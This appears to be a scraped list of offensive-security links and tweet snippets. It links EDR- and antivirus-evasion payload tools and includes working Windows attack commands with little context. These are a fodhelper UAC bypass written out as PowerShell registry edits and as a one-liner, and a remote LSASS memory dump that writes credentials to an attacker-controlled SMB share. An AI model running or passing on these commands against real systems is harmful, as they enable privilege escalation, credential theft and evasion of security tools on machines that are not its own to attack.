GitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.
https://github.com/optiv/ScareCrow
GitHub - Porchetta-Industries/pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
https://github.com/Porchetta-Industries/pyMalleableC2
UAC bypass in 2 lines:
cmd -> fodhelper
PoC||GTFO
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force
New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
Get #Admin #rights #windows10, 1 string
powershell:
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force;New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force;fodhelper
BetterXencrypt: Powershell runtime crypter designed to evade AVs
https://securityonline.info/betterxencrypt-powershell-runtime-crypter-designed-to-evade-avs/
BetterXencrypt is a better version of Xencrypt. Xencrypt itself is a PowerShell runtime crypter designed to evade AVs. cause Xencrypt is not FUD
Extract all endpoints from a JS File with this oneliner:)
cat files.txt | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9?&=\/\-#.]*(?=(\"|\'|\`))" | sort -u | tee output.txt
GitHub - GetRektBoy724/MeterPwrShell: Automated Tool That Generate The Perfect Powershell Payload
https://github.com/GetRektBoy724/MeterPwrShell#installation
Remote LSASS dump without touching local disk? Yes :)
On target run:
1) net use x: \\smbserver_under_your_control\c$\
2) powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full
Our latest blog post explores vulnerabilities and possible Apple copyright violations in Cellebrite's software:
"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"
-signal
GitHub - lennartkoopmann/nzyme: Nzyme is a free and open next-generation WiFi defense system. Go to www.nzyme.org for more information.
https://github.com/lennartkoopmann/nzyme#getting-started